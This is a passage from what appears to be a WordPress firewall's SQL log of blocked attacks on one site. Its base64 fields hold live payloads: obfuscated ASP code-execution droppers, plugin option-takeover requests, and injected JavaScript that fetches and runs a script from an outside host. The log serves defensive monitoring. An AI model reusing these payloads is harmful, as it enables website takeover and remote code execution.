jE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9jb25maWcvQXNwQ21zX0NvbmZpZy5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37850,1569949998.594245,1569949997.031100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37915,1570674520.502433,1570674519.523800,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//dxyylc/md5.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9keHl5bGMvbWQ1LmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37895,1570544587.553328,1570544586.765800,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//images/Sql.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYl0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9pbWFnZXMvU3FsLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37723,1569411920.411659,1569411919.558900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37919,1570674557.296778,1570674556.283400,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//images/css/Thumb.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9pbWFnZXMvY3NzL1RodW1iLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37722,1569411922.650828,1569411921.855600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37736,1569528571.542579,1569528570.535100,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦°¸',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FkZmlvZHNneXNuN3NpOD1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qKi8sMTE2LypfOWtrcDlmdDB3YWwyYm5iKi8sMTE2LyoqLywxMTIvKiovLDExNS8qKi8sNTgvKl9rcjF0dXRhNW1lMXkyeXgqLyw0Ny8qKi8sNDcvKiovLDk4LypfYWRmaW9kc2d5c243c2k4Ki8sMTAxLypfa3IxdHV0YTVtZTF5Mnl4Ki8sMTE1LyoqLyw0Ni8qXzlra3A5ZnQwd2FsMmJuYiovLDk4LyoqLywxMDEvKiovLDEwOC8qX3NiZzc3bW53emd0ODcxbyovLDk3LyoqLywxMTYvKiovLDEwMS8qX2FkZmlvZHNneXNuN3NpOCovLDExNC8qXzlra3A5ZnQwd2FsMmJuYiovLDk4LypfYWRmaW9kc2d5c243c2k4Ki8sMTAxLypfOWtrcDlmdDB3YWwyYm5iKi8sMTE5Lypfc2JnNzdtbnd6Z3Q4NzFvKi8sOTcvKl9rcjF0dXRhNW1lMXkyeXgqLywxMTUvKiovLDExNi8qKi8sMTA0LyoqLywxMDEvKl9zYmc3N21ud3pndDg3MW8qLywxMTQvKl9zYmc3N21ud3pndDg3MW8qLywxMDEvKl85a2twOWZ0MHdhbDJibmIqLyw0Ni8qXzlra3A5ZnQwd2FsMmJuYiovLDk5LypfOWtrcDlmdDB3YWwyYm5iKi8sMTExLypfYWRmaW9kc2d5c243c2k4Ki8sMTA5LypfOWtrcDlmdDB3YWwyYm5iKi8sNDcvKl9hZGZpb2RzZ3lzbjdzaTgqLywxMTYvKiovLDExNC8qX2FkZmlvZHNneXNuN3NpOCovLDk3LyoqLywxMTAvKl9zYmc3N21ud3pndDg3MW8qLywxMTUvKl85a2twOWZ0MHdhbDJibmIqLyw0Ny8qKi8sMTAwLypfc2JnNzdtbnd6Z3Q4NzFvKi8sMTExLypfYWRmaW9kc2d5c243c2k4Ki8sMTE5LypfOWtrcDlmdDB3YWwyYm5iKi8sMTEwLyoqLywxMTYvKiovLDk3Lypfa3IxdHV0YTVtZTF5Mnl4Ki8sMTEyLyoqLywxMDEvKl9zYmc3N21ud3pndDg3MW8qLyw0Ni8qX2tyMXR1dGE1bWUxeTJ5eCovLDEwNi8qX2FkZmlvZHNneXNuN3NpOCovLDExNS8qKi8sNjMvKl9hZGZpb2RzZ3lzbjdzaTgqLyk7dmFyIF9zYmc3N21ud3pndDg3MW8gPSBfOWtrcDlmdDB3YWwyYm5iKF9hZGZpb2RzZ3lzbjdzaTgpO2lmKF9zYmc3N21ud3pndDg3MW8ubGVuZ3RoID4gMyl7XzVpdTlrbDNnY2hpdTZscyhfc2JnNzdtbnd6Z3Q4NzFvKTt9IGZ1bmN0aW9uIF85a2twOWZ0MHdhbDJibmIoX205Nnk0N3N6NmM0N20yZil7IHZhciBfa3IxdHV0YTVtZTF5Mnl4ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2tyMXR1dGE1bWUxeTJ5eC5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX205Nnk0N3N6NmM0N20yZiwgZmFsc2UgKTtfa3IxdHV0YTVtZTF5Mnl4LnNlbmQoIG51bGwgKTtyZXR1cm4gX2tyMXR1dGE1bWUxeTJ5eC5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF81aXU5a2wzZ2NoaXU2bHModG9kbyl7IHZhciBfODEwcWp3OTJwY3V3ZGd3ID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfODEwcWp3OTJwY3V3ZGd3KDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37725,1569411929.211513,1569411928.295900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37732,1569488883.093070,1569488881.521500,'\0\0\0\0\0\0\0\0\0\0ÿÿ}iŒJ',0,403,0,0,0,'http://bintara.com.my/?page=gourlfile&id=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"Lw==\",\"category\":\"file_upload\",\"ssl\":0}'),(37724,1569411918.089424,1569411917.264500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37721,1569411875.192695,1569411874.306900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37914,1570674513.524326,1570674512.462500,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//data/img/css/xianf.ASP','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3hmXQ==\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9kYXRhL2ltZy9jc3MveGlhbmYuQVNQ\",\"category\":\"sqli\",\"ssl\":0}'),(37896,1570544602.089157,1570544601.237300,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//images/css/Thumb.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9pbWFnZXMvY3NzL1RodW1iLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37897,1570544770.715451,1570544769.910400,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//md5.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Bhc3Nd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9tZDUuYXNw\",\"category\":\"sqli\",\"ssl\":0}'),(37726,0.000000,1569458544.463941,'\0\0\0\0\0\0\0\0\0\0ÿÿs„‘€',0,302,0,1,0,'https://bintara.com.my/wp-login.php','https://bintara.com.my/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','loginOK',NULL,NULL),(37727,1569475907.714820,1569475906.767900,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥!',0,200,0,0,0,'http://bintara.com.my/?page_id=18','http://Bintara.net/?page_id=18','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15','logged:waf','Generic X-Forwarded-For Injection','{\"learningMode\":0,\"failedRules\":\"logged|150\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\",\"paramValue\":\"dW5rbm93bg==\",\"path\":\"Lw==\",\"category\":\"bypass\",\"ssl\":0}'),(37728,1569477746.432583,1569477745.589400,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/','https://bintara.com.my/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Lw==\",\"category\":\"logged\",\"ssl\":1}'),(37855,1569949979.598415,1569949978.399000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLy